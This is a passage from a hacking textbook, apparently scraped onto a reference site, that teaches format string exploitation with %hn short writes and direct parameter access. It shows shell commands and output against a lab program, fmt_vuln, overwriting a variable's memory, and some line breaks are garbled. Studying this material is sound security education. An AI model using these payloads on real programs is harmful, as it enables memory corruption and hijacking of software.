Graphics Programs Reference
In-Depth Information
Since the stack doesn't need to be printed to reach our addresses, the
number of bytes written at the first format parameter is 16. Direct parameter
access is only used for the
%n
parameters, since it really doesn't matter what
values are used for the
%x
spacers. This method simplifies the process of
writing an address and shrinks the mandatory size of the format string.
0x356
Using Short Writes
Another technique that can simplify format string exploits is using short
writes. A
short
is typically a two-byte word, and format parameters have a
special way of dealing with them. A more complete description of possible
format parameters can be found in the printf manual page. The portion
describing the length modifier is shown in the output below.
The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion.
h A following integer conversion corresponds to a short int or
unsigned short int argument, or a following n conversion
corresponds to a pointer to a short int argument.
This can be used with format string exploits to write two-byte shorts. In
the output below, a short (shown in bold) is written in at both ends of the
four-byte
test_val
variable. Naturally, direct parameter access can still be used.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff
0015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 1441720
0x0015
ffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
r
eader@hacking:~/booksrc $
Using short writes, an entire four-byte value can be overwritten with just
two
%hn
parameters. In the example below, the
test_val
variable will be over-
written once again with the address
0xbffffd72
.
